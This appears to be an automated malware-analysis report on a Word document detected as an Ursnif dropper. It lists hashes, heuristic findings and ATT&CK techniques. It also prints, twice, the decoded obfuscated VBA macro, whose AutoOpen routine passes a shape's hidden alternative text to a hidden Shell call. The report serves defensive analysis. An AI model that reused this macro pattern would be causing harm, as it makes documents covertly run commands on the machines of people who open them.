Ursnif Office (OLE) malware analysis — malicious · 674e0765e67ca481

MALICIOUS

Office (OLE)

74.5 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2019-03-10

MD5: 0d0baf515932b058697811c39dc1305f SHA-1: cd90b9b7d4a74c3fb1ade85a6a42fbe7666595a1 SHA-256: 674e0765e67ca4818ad0da62d4fcaed1ff57eb12cd2d2664278c5db39960a4ae

202 Risk Score

Malware Insights

Ursnif · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA macro, a common technique for executing arbitrary commands. The ClamAV detection 'Doc.Dropper.Ursnif-6864686-0' strongly suggests the Ursnif family, known for its dropper capabilities. The AutoOpen macro marker further supports the automated execution of malicious code upon opening the document.

Heuristics 6

ClamAV: Doc.Dropper.Ursnif-6864686-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Ursnif-6864686-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3434 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3434 bytes
SHA-256: `634ab903abfd9cf451dbf88ffa6a7e2987aebbfff88e78751c9df91f140bfbda`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "ktujipo" Function lhukacytufy() Dim rdababe As Integer Dim ILhDNh As Long rdababe = 9401 + 1439 Dim nfykegygat As Integer Dim dlig As Long nfykegygat = 4972 + 4547 Dim jjededa As Integer Dim ADYcwJ As Long jjededa = 9040 + 8168 Dim YjQWMsUH As Integer Dim jdirar As Long YjQWMsUH = 1021 + 7059 Dim sgecuxaj As Integer Dim fjudupesos As Long sgecuxaj = 3332 + 8012 Dim WQeACzG As Integer Dim nzubuxemute As Long WQeACzG = 4701 + 9152 Dim npyreh As Integer Dim lpumuwetuta As Long npyreh = 7613 + 1886 Dim vGzLue As Integer Dim nhadajeri As Long vGzLue = 9708 + 6530 Dim ZuKzm As Integer Dim STMWgXn As Long ZuKzm = 1119 + 2263 sfifujukawy = "ghezuzeqe" Dim JfXIC As Integer Dim rFpbEGj As Long JfXIC = 9893 + 7431 Dim jmoFUWl As Integer Dim xwyse As Long jmoFUWl = 2918 + 6125 Dim nXKxKsno As Integer Dim wziqopywum As Long nXKxKsno = 3208 + 3172 Dim AJgslO As Integer Dim krahiqahu As Long AJgslO = 8765 + 9981 Dim VApfn As Integer Dim gtefefibawa As Long VApfn = 3274 + 9028 Dim rcyc As Integer Dim agKMLQv As Long rcyc = 9520 + 3672 Dim KSWPc As Integer Dim vzazacurap As Long KSWPc = 8310 + 2246 Dim GYAJVdrD As Integer Dim jzAMBYd As Long GYAJVdrD = 3880 + 4962 Dim bnujevim As Integer Dim njafezimawy As Long bnujevim = 2338 + 2845 Set lhukacytufy = ActiveDocument.Shapes(sfifujukawy) End Function Sub AutoOpen() Dim YphtCEYn As Integer Dim gzel As Long YphtCEYn = 9092 + 6541 Dim kBAaDtOq As Integer Dim pnuwiqij As Long kBAaDtOq = 2094 + 1711 Dim jrMxJE As Integer Dim ynyhLH As Long jrMxJE = 7955 + 3289 Dim DmWGYWp As Integer Dim ckejaqaduv As Long DmWGYWp = 5265 + 8962 Dim ncyven As Integer Dim mqozi As Long ncyven = 1110 + 4065 Dim kbezafavudu As Integer Dim QbNHB As Long kbezafavudu = 2648 + 4682 Set xvimiwuhax = lhukacytufy Dim FGRJbKbG As Integer Dim xblgeRF As Long FGRJbKbG = 8819 + 6467 Dim oyLzk As Integer Dim drunexe As Long oyLzk = 7960 + 1145 Dim QRSyuTV As Integer Dim ptoqot As Long QRSyuTV = 3223 + 6703 Interaction.Shell$ _ xvimiwuhax.AlternativeText, vbHide Dim foCtV As Integer Dim UCJjYN As Long foCtV = 3574 + 2335 Dim spamovytowa As Integer Dim TheeM As Long spamovytowa = 4769 + 1035 Dim whakohocaq As Integer Dim wZkJB As Long whakohocaq = 1019 + 1861 Dim gpojylotyr As Integer Dim FKxoEdJd As Long gpojylotyr = 4514 + 2182 Dim bwona As Integer Dim fgeqevo As Long bwona = 6063 + 3965 Dim oyXQqljQ As Integer Dim osjhijd As Long oyXQqljQ = 6993 + 8354 Dim KfKehwL As Integer Dim ItgHN As Long KfKehwL = 4853 + 8597 Dim pvNAuUtL As Integer Dim YrAyPWjU As Long pvNAuUtL = 3529 + 3940 Dim qFJJpXZ As Integer Dim gtehigyli As Long qFJJpXZ = 6871 + 5003 Dim tcuxerop As Integer Dim FRQZnp As Long tcuxerop = 6293 + 1170 Dim zgakofy As Integer Dim vwew As Long zgakofy = 7889 + 3751 Dim ANfMR As Integer Dim vdurober As Long ANfMR = 1194 + 9962 End Sub

SHA-256: 634ab903abfd9cf451dbf88ffa6a7e2987aebbfff88e78751c9df91f140bfbda

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ktujipo"
Function lhukacytufy()


Dim rdababe As Integer

Dim ILhDNh As Long

rdababe = 9401 + 1439

Dim nfykegygat As Integer

Dim dlig As Long

nfykegygat = 4972 + 4547

Dim jjededa As Integer
Dim ADYcwJ As Long
jjededa = 9040 + 8168

Dim YjQWMsUH As Integer

Dim jdirar As Long

YjQWMsUH = 1021 + 7059

Dim sgecuxaj As Integer

Dim fjudupesos As Long

sgecuxaj = 3332 + 8012

Dim WQeACzG As Integer
Dim nzubuxemute As Long
WQeACzG = 4701 + 9152

Dim npyreh As Integer

Dim lpumuwetuta As Long

npyreh = 7613 + 1886

Dim vGzLue As Integer

Dim nhadajeri As Long

vGzLue = 9708 + 6530

Dim ZuKzm As Integer
Dim STMWgXn As Long
ZuKzm = 1119 + 2263

sfifujukawy = "ghezuzeqe"


Dim JfXIC As Integer

Dim rFpbEGj As Long

JfXIC = 9893 + 7431

Dim jmoFUWl As Integer

Dim xwyse As Long

jmoFUWl = 2918 + 6125

Dim nXKxKsno As Integer
Dim wziqopywum As Long
nXKxKsno = 3208 + 3172

Dim AJgslO As Integer

Dim krahiqahu As Long

AJgslO = 8765 + 9981

Dim VApfn As Integer

Dim gtefefibawa As Long

VApfn = 3274 + 9028

Dim rcyc As Integer
Dim agKMLQv As Long
rcyc = 9520 + 3672

Dim KSWPc As Integer

Dim vzazacurap As Long

KSWPc = 8310 + 2246

Dim GYAJVdrD As Integer

Dim jzAMBYd As Long

GYAJVdrD = 3880 + 4962

Dim bnujevim As Integer
Dim njafezimawy As Long
bnujevim = 2338 + 2845

Set lhukacytufy = ActiveDocument.Shapes(sfifujukawy)


End Function
Sub AutoOpen()


Dim YphtCEYn As Integer

Dim gzel As Long

YphtCEYn = 9092 + 6541

Dim kBAaDtOq As Integer

Dim pnuwiqij As Long

kBAaDtOq = 2094 + 1711

Dim jrMxJE As Integer
Dim ynyhLH As Long
jrMxJE = 7955 + 3289

Dim DmWGYWp As Integer

Dim ckejaqaduv As Long

DmWGYWp = 5265 + 8962

Dim ncyven As Integer

Dim mqozi As Long

ncyven = 1110 + 4065

Dim kbezafavudu As Integer
Dim QbNHB As Long
kbezafavudu = 2648 + 4682

Set xvimiwuhax = lhukacytufy


Dim FGRJbKbG As Integer

Dim xblgeRF As Long

FGRJbKbG = 8819 + 6467

Dim oyLzk As Integer

Dim drunexe As Long

oyLzk = 7960 + 1145

Dim QRSyuTV As Integer
Dim ptoqot As Long
QRSyuTV = 3223 + 6703

Interaction.Shell$ _
xvimiwuhax.AlternativeText, vbHide


Dim foCtV As Integer

Dim UCJjYN As Long

foCtV = 3574 + 2335

Dim spamovytowa As Integer

Dim TheeM As Long

spamovytowa = 4769 + 1035

Dim whakohocaq As Integer
Dim wZkJB As Long
whakohocaq = 1019 + 1861

Dim gpojylotyr As Integer

Dim FKxoEdJd As Long

gpojylotyr = 4514 + 2182

Dim bwona As Integer

Dim fgeqevo As Long

bwona = 6063 + 3965

Dim oyXQqljQ As Integer
Dim osjhijd As Long
oyXQqljQ = 6993 + 8354

Dim KfKehwL As Integer

Dim ItgHN As Long

KfKehwL = 4853 + 8597

Dim pvNAuUtL As Integer

Dim YrAyPWjU As Long

pvNAuUtL = 3529 + 3940

Dim qFJJpXZ As Integer
Dim gtehigyli As Long
qFJJpXZ = 6871 + 5003

Dim tcuxerop As Integer

Dim FRQZnp As Long

tcuxerop = 6293 + 1170

Dim zgakofy As Integer

Dim vwew As Long

zgakofy = 7889 + 3751

Dim ANfMR As Integer
Dim vdurober As Long
ANfMR = 1194 + 9962

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.